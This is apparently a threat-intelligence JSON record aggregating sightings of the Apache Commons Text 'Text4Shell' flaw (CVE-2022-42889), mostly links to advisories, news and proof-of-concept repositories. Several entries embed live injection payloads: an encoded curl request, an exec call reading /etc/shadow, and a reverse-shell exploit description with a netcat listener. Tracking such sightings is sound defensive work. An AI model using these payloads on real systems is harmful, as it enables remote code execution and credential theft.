{"vulnerability": "CVE-2022-42889", "sightings": [{"uuid": "e3abde3a-125c-45b6-a8bc-c643fd82c9d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:45.000000Z"}, {"uuid": "2e9493cf-f400-4d54-be96-8b450be491cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "seen", "source": "MISP/a9d21043-f825-4bac-8d2b-56fb9e8343e7", "content": "", "creation_timestamp": "2025-10-23T21:13:00.000000Z"}, {"uuid": "7f129a1b-7576-4722-8d0c-53cb2c6095a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:10:49.000000Z"}, {"uuid": "efd6e595-dff8-4ab7-8204-f9f7129785bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3ln6ztjjbaq2t", "content": "", "creation_timestamp": "2025-04-19T21:02:16.548636Z"}, {"uuid": "21645ce9-6082-4ae4-91cb-53f4223c670d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/apache_commons_text4shell.rb", "content": "", "creation_timestamp": "2024-01-19T12:27:27.000000Z"}, {"uuid": "f995c68f-4b2d-4d79-aaef-0a00a4478105", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "Telegram/E2uaRG3ibx0u7X-3lCLRMt1JB-4VLbsHUeFUOFQXBK1KcJ8", "content": "", "creation_timestamp": "2026-01-02T09:00:05.000000Z"}, {"uuid": "0f5824b1-62ad-4afe-9ead-1623e0e015ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2022-42889", "type": "seen", "source": "https://bsky.app/profile/cyberhub.blog/post/3maifck3fu32s", "content": "", "creation_timestamp": "2025-12-21T09:20:07.885781Z"}, {"uuid": "3f2c214b-a4d9-4486-adb4-690cd0e78928", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "seen", "source": "MISP/d17bd6ef-d68b-317b-ac33-cdbc44c5fc57", "content": "", "creation_timestamp": "2025-08-31T03:12:47.000000Z"}, {"uuid": "420d28f5-a9fe-479e-8ea4-c36d8926f6e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "seen", "source": "MISP/ab0b745f-bbd5-338e-8b92-97dd0c757e9d", "content": "", "creation_timestamp": "2025-08-31T03:01:05.000000Z"}, {"uuid": "4da8fec4-c1f2-49a0-94f5-f79a29636f21", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2022-42889", "type": "seen", "source": "https://www.knime.com/security/advisories#CVE-2026-4649", "content": "", "creation_timestamp": "2026-03-25T03:00:10.000000Z"}, {"uuid": "0ff2abb1-59b7-4270-9a18-e07d1133db95", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2022-42889", "type": "seen", "source": "https://www.kyberturvallisuuskeskus.fi/fi/haavoittuvuus_19/2022", "content": "", "creation_timestamp": "2022-10-18T08:13:29.000000Z"}, {"uuid": "3d82b77d-5206-4dfb-8657-0a198e8e57ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/cKure/10336", "content": "\u25a0\u25a0\u25a0\u25a0\u25a0 Apache Text4Shell (CVE-2022-42889)\n\ncurl http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.get.Runtime%28%29.exec%28%5C%27%27%2E%74%72%69%6D%28%24%63%6D%64%29%2E%27%5C%27%29%7D", "creation_timestamp": "2022-10-23T18:03:54.000000Z"}, {"uuid": "05cd1f94-d11d-4dfc-879c-d1a42d89303d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/yafcab/5", "content": "https://lab.wallarm.com/new-text2shell-rce-vulnerability-in-apache-common-texts-cve-2022-42889/\n\u0421\u0432\u0435\u0436\u0430\u044f \u0440\u0446\u0435 \u043f\u043e \u043c\u043e\u0442\u0438\u0432\u0430\u043c log4j\n${script:javascript:java.lang.Run.Runtime.getRuntime().exec(\"cat /etc/shadow\");}", "creation_timestamp": "2022-10-18T15:04:13.000000Z"}, {"uuid": "8f06aa7c-05a2-4c87-8d4b-5af26d818102", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/3091", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aThis project includes a python script which generates malicious commands leveraging CVE-2022-42889 vulnerability\nURL\uff1ahttps://github.com/stavrosgns/Text4ShellPayloads\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-10-30T03:38:07.000000Z"}, {"uuid": "42920e92-ab52-4e8d-ac3f-59336cf34660", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/3178", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-42889 (a.k.a. Text4Shell) RCE Proof of Concept\nURL\uff1ahttps://github.com/sunnyvale-it/CVE-2022-42889-PoC\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-11-05T08:15:46.000000Z"}, {"uuid": "3e1c8247-1b0a-4bef-8e04-156675fbdc8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/arm1tage/380", "content": "CVE-2022-42889\n\u041f\u043e\u0447\u0438\u0442\u0430\u0442\u044c \u043f\u0440\u043e \u0434\u044b\u0440\u043a\u0443 \u0442\u0443\u0442\n\u0421\u043a\u0430\u043d\u0435\u0440 \u0434\u044b\u0440\u043a\u0438 \u043d\u0430 \u043f\u0438\u0442\u043e\u043d\u0435 text4shell-tools\n\u0421\u043a\u0430\u043d\u0435\u0440 \u0434\u044b\u0440\u043a\u0438 \u0434\u043b\u044f BurpSuite burp-text4shell\n\u041f\u043e\u0438\u0433\u0440\u0430\u0442\u044c\u0441\u044f \u0441 \u0434\u044b\u0440\u043a\u043e\u0439 \u0432 \u0434\u043e\u043a\u0435\u0440\u0435 text4shell-docker\n\u0421\u0430\u043c POC\n\n#apache #exploit #poc", "creation_timestamp": "2023-01-10T18:22:39.000000Z"}, {"uuid": "74e30d7c-5983-48a0-bdf4-81687b5890be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/3105", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-42889 aka Text4Shell research & PoC\nURL\uff1ahttps://github.com/cxzero/CVE-2022-42889-text4shell\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-10-24T00:20:14.000000Z"}, {"uuid": "a2bb2be5-0c91-403e-8643-779922922ae8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/3196", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aProof of Concept for CVE-2022-42889 (Text4Shell Vulnerability) \nURL\uff1ahttps://github.com/cryxnet/CVE-2022-42889-RCE\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-11-07T18:12:39.000000Z"}, {"uuid": "6f93954f-a607-4351-80e0-df12d8b43b44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/3101", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aVulnerability Scanner for CVE-2022-42889 (Text4Shell)\nURL\uff1ahttps://github.com/smileostrich/Text4Shell-Scanner\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-10-24T07:39:39.000000Z"}, {"uuid": "7f5d8945-00ad-48a8-8ba0-a3414c12bcea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/3099", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aA simple dockerize application that shows how to exploit the CVE-2022-42889 vulnerability.\nURL\uff1ahttps://github.com/0xmaximus/Apache-Commons-Text-CVE-2022-42889\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-10-31T08:34:07.000000Z"}, {"uuid": "a32699ef-cd87-45c7-8963-95e1a9fdf7a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/3145", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aProof of Concept Appliction for testing CVE-2022-42889\nURL\uff1ahttps://github.com/securekomodo/text4shell-poc\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-10-31T16:09:44.000000Z"}, {"uuid": "e3f7a7b6-8958-4a4f-98fb-17a42f5b6f5b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/3436", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aProof of Concept for CVE-2022-42889 (Text4Shell Vulnerability) \nURL\uff1ahttps://github.com/cryxnet/CVE-2022-42889-RCE\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-11-17T07:27:55.000000Z"}, {"uuid": "26ad7c07-6f08-447f-b6fd-999a534fa485", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/3131", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aApache commons text - CVE-2022-42889 Text4Shell proof of concept exploit.\nURL\uff1ahttps://github.com/kljunowsky/CVE-2022-42889-text4shell\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-10-28T23:44:58.000000Z"}, {"uuid": "05f988a5-c567-41a2-a005-c9cacce572b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/3168", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-42889 Blind-RCE Nuclei Template\nURL\uff1ahttps://github.com/Hack4rLIFE/CVE-2022-42889\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-11-02T21:58:59.000000Z"}, {"uuid": "88015ff6-f523-434c-96d3-ad8a7fea4107", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/ETHICALHACKERSCOMMUNITY2/4444", "content": "A custom Python-based proof-of-concept (PoC) exploit targeting Text4Shell (CVE-2022-42889), a critical remote code execution vulnerability (https://www.kitploit.com/search/label/Vulnerability) in Apache Commons Text versions < 1.10.  This exploit targets vulnerable (https://www.kitploit.com/search/label/Vulnerable) Java applications that use the StringSubstitutor class with interpolation enabled, allowing injection (https://www.kitploit.com/search/label/Injection) of ${script:...} expressions to execute arbitrary system commands.  In this PoC, exploitation is demonstrated via the data query parameter (https://www.kitploit.com/search/label/Parameter); however, the vulnerable parameter (https://www.kitploit.com/search/label/Parameter) name may vary depending on the implementation. Users should adapt the payload (https://www.kitploit.com/search/label/Payload) and request path accordingly based on the target application's logic.  Disclaimer: This exploit is provided for educational and authorized penetration testing purposes only. Use responsibly and at your own risk.\n  Description  This is a custom Python3 exploit for the Apache Commons Text vulnerability known as Text4Shell (CVE-2022-42889). It allows Remote Code Execution (RCE) via insecure interpolators when user input is dynamically evaluated by StringSubstitutor.  Tested against:  - Apache Commons Text < 1.10.0  - Java applications using ${script:...} interpolation from untrusted input  Usage  python3 text4shell.py   \n  Example  python3 text4shell.py 127.0.0.1 192.168.1.2 4444\n  Make sure to set up a lsitener on your attacking machine:  nc -nlvp 4444\n  Payload Logic  The script injects:  ${script:javascript:java.lang.Runtime.getRuntime().exec(...)}\n  The reverse shell is sent via /data parameter using a POST request.\n\nDownload Text4Shell-Exploit (https://github.com/chaudharyarjun/text4shell-exploit)", "creation_timestamp": "2025-04-23T13:36:36.000000Z"}, {"uuid": "72bae340-7d2d-406d-b087-ff5101a2661c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/3177", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aProof of Concept for CVE-2022-42889 (Text4Shell Vulnerability) \nURL\uff1ahttps://github.com/cryxnet/CVE-2022-42889-PoC\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-11-04T19:31:42.000000Z"}, {"uuid": "ad19ed06-555c-49a7-8215-0a22b955a7bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "Telegram/p_EvDlFgEJuiOJi0pdpDLW7XAzWWPVWvDgc6lfDEOZmEhu0", "content": "", "creation_timestamp": "2026-03-30T15:00:06.000000Z"}, {"uuid": "22c5aaf3-94e1-4e7a-bf4b-fab335cec821", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/3093", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-42889-POC_TEXT4SHELL\nURL\uff1ahttps://github.com/jayaram-yalla/CVE-2022-42889-POC_TEXT4SHELL\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-12-02T07:51:21.000000Z"}, {"uuid": "c3025667-15a3-4d60-9330-bfba4d2716bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/3092", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aA simple application that shows how to exploit the CVE-2022-42889 vulnerability\nURL\uff1ahttps://github.com/korteke/CVE-2022-42889-POC\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-10-22T07:39:00.000000Z"}, {"uuid": "5951f214-1455-4bf7-8b73-9b059856252f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/3098", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aA simple dockerize application that shows how to exploit the CVE-2022-42889 vulnerability.\nURL\uff1ahttps://github.com/akshayithape-devops/CVE-2022-42889-POC\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-10-23T05:54:29.000000Z"}, {"uuid": "34866161-33d1-44b1-b382-e263b7c701ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/ETHICALHACKERSCOMMUNITY2/4442", "content": "Text4Shell-Exploit - A Custom Python-based Proof-Of-Concept (PoC) Exploit Targeting Text4Shell (CVE-2022-42889), A Critical Remote Code Execution Vulnerability In Apache Commons Text Versions < 1.10\nhttp://www.kitploit.com/2025/04/text4shell-exploit-custom-python-based.html", "creation_timestamp": "2025-04-23T13:36:37.000000Z"}, {"uuid": "8cfdf532-cde2-43d7-9bde-8c317c9a69c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/TengkorakCyberCrewzz/1709", "content": "Text4Shell-Exploit - A Custom Python-based Proof-Of-Concept (PoC) Exploit Targeting Text4Shell (CVE-2022-42889), A Critical Remote Code Execution Vulnerability In Apache Commons Text Versions < 1.10 \u2013 kitploit.com\n\nWed, 23 Apr 2025 20:30:00", "creation_timestamp": "2025-04-23T16:03:13.000000Z"}, {"uuid": "147aa2cc-9de7-480d-b0d1-59e358e9bbc4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/poxek/2540", "content": "#CVE #POC\n\nText4Shell CVE-2022-42889\nCVE-2022-42889 Text4Shell affects Apache Commons Text versions 1.5 through 1.9. It has been patched as of Commons Text version 1.10. \n\nPOC:\ncurl http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.get.Runtime%28%29.exec%28%5C%27%27%2E%74%72%69%6D%28%24%63%6D%64%29%2E%27%5C%27%29%7D", "creation_timestamp": "2022-10-27T17:20:04.000000Z"}, {"uuid": "d4e1a608-3fd9-4337-b325-7245e42c87f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/arm1tage/381", "content": "https://infosecwriteups.com/text4shell-poc-cve-2022-42889-f6e9df41b3b7", "creation_timestamp": "2022-10-21T05:41:50.000000Z"}, {"uuid": "0c537d85-6da1-4f8f-99b6-1fd8e1cfaf09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/TopCyberTechNews/184", "content": "Top Security News for 21/10/2022\n\nLog4J-scan update: Detection for Apache Commons Text RCE (CVE-2022-42889)\nhttps://www.reddit.com/r/netsec/comments/y91sp9/log4jscan_update_detection_for_apache_commons/ \n\nExperts spotted a new undetectable PowerShell Backdoor posing as a Windows update\nhttps://securityaffairs.co/wordpress/137410/malware/undetectable-powershell-backdoor.html \n\nCybersecurity Workforce Study released.\nhttps://thecyberwire.com/stories/8857909f273f46529695d5ea8caf954d/cybersecurity-workforce-study-released \n\nReverse Engineering the Apple MultiPeer Connectivity Framework\nhttps://www.reddit.com/r/netsec/comments/y907qk/reverse_engineering_the_apple_multipeer/ \n\nISC StormCast for Friday, October 21st, 2022\nhttps://isc.sans.edu/podcastdetail.html?id=8224 \n\nGuLoader Malware Disguised as a Word File Being Distributed in Korea\nhttps://malware.news/t/guloader-malware-disguised-as-a-word-file-being-distributed-in-korea/64374#post_1 \n\nISC Stormcast For Friday, October 21st, 2022 https://isc.sans.edu/podcastdetail.html?id=8224, (Fri, Oct 21st)\nhttps://isc.sans.edu/diary/rss/29172 \n\n5 essential security tips for SMBs\nhttps://www.malwarebytes.com/blog/business/2022/10/5-essential-security-tips-for-smbs \n\nGoogle Launches GUAC Open Source Project to Secure Software Supply Chain\nhttps://thehackernews.com/2022/10/google-launches-guac-open-source.html \n\nSHA-3 Buffer Overflow - CVE-2022-37454\nhttps://www.reddit.com/r/netsec/comments/y98ox2/sha3_buffer_overflow_cve202237454/ \n\n    \nFollow Top Cyber News at https://t.me/TopCyberTechNews\nFeel free to DM me at https://twitter.com/ShayaFeedman", "creation_timestamp": "2022-10-21T07:00:29.000000Z"}, {"uuid": "d5c30cdd-bea7-42b1-aecc-3a59ecbaa069", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/TopCyberTechNews/182", "content": "Top Security News for 19/10/2022\n\nAltruism under attack: why cybersecurity has become essential to humanitarian nonprofits\nhttps://www.csoonline.com/article/3676668/altruism-under-attack-why-cybersecurity-has-become-essential-to-humanitarian-nonprofits.html#tk.rss_all \n\nCVE-2022-42889 (Text4Shell) OSS detector - Finds possibly vulnerable JAR files\nhttps://www.reddit.com/r/netsec/comments/y7aohf/cve202242889_text4shell_oss_detector_finds/ \n\nFake tractor fraudsters plague online transactions\nhttps://www.malwarebytes.com/blog/news/2022/10/fake-tractor-fraudsters-plague-online-transactions \n\nISC StormCast for Wednesday, October 19th, 2022\nhttps://isc.sans.edu/podcastdetail.html?id=8220 \n\nData Collection\nhttps://malware.news/t/data-collection/64276#post_1 \n\nCVE-2022-28762: Zoom for macOS contains a debugging port misconfiguration\nhttps://securityaffairs.co/wordpress/137266/security/zoom-macos-cve-2022-28762.html \n\nFortiOS, FortiProxy, and FortiSwitchManager Authentication Bypass Technical Deep Dive (CVE-2022-40684) + PoC\nhttps://www.reddit.com/r/netsec/comments/y3lgv3/fortios_fortiproxy_and_fortiswitchmanager/ \n\nOur new scanner for Text4Shell\nhttps://www.reddit.com/r/netsec/comments/y7gf09/our_new_scanner_for_text4shell/ \n\nSecurity Alert: Oracle Releases Critical Patch Update, October 2022\nhttps://malware.news/t/security-alert-oracle-releases-critical-patch-update-october-2022/64278#post_1 \n\nHow to spot a scam\nhttps://malware.news/t/how-to-spot-a-scam/64274#post_1 \n\n    \nFollow Top Cyber News at https://t.me/TopCyberTechNews\nFeel free to DM me at https://twitter.com/ShayaFeedman", "creation_timestamp": "2022-10-19T07:00:05.000000Z"}, {"uuid": "f3753d0c-0f1a-4625-9c2f-2bd9de7b558a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "seen", "source": "https://t.me/ctinow/71736", "content": "Ask your WAF vendor: \u201cDo you block text4shell (CVE-2022-42889) zero-day attack?\u201d - Check Point Blog\n\nhttps://ift.tt/8Az0ocQ", "creation_timestamp": "2022-10-27T20:06:21.000000Z"}, {"uuid": "b97baab6-7ce8-4843-a0b0-70ec4f490420", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/cybershit/860", "content": "\u0422\u0430\u043c \u0432 \u043b\u0438\u0431\u0435 Apache Commons Text \u043d\u0430\u0448\u043b\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0443\u044e \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u0434\u0430 \u2014 CVE-2022-42889. \n\n\u041d\u043e \u043d\u0435\u0441\u043c\u043e\u0442\u0440\u044f \u043d\u0430 CVSS 9.8, \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0442\u043e\u043b\u044c\u043a\u043e \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043c\u0435\u0442\u043e\u0434\u043e\u0432, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0445 \u0441 \u0438\u043d\u0442\u0435\u0440\u043f\u043e\u043b\u044f\u0446\u0438\u0435\u0439 \u0434\u0430\u043d\u043d\u044b\u0445, \u0447\u0442\u043e \u0432 \u0446\u0435\u043b\u043e\u043c \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u043d\u0435 \u0442\u0430\u043a \u043a\u0440\u0438\u0442\u0438\u0447\u043d\u043e.\n\n\u041f\u043e\u0438\u0441\u043a\u0430\u0442\u044c \u0432 \u043a\u043e\u0434\u0435 \u043c\u043e\u0436\u043d\u043e \u043f\u043e:\nStringLookupFactory.INSTANCE.interpolatorStringLookup().lookup()\n\u0438\u043b\u0438 \nStringSubstitutor.createInterpolator().replace()\n\n\u0412 \u043b\u044e\u0431\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u0432\u043e\u0437\u044c\u043c\u0438\u0442\u0435 \u043d\u0430 \u0432\u043e\u043e\u0440\u0443\u0436\u0435\u043d\u0438\u0435 \u0438 \u0435\u0441\u043b\u0438 \u043b\u0435\u043d\u044c \u0447\u0438\u0442\u0430\u0442\u044c \u043a\u043e\u0434 \u043f\u0440\u043e\u0441\u0442\u043e \u043f\u0440\u043e\u043f\u0430\u0442\u0447\u0438\u0442\u0435 \u043b\u0438\u0431\u044b \u0434\u043e \u043d\u043e\u0432\u043e\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 1.10, 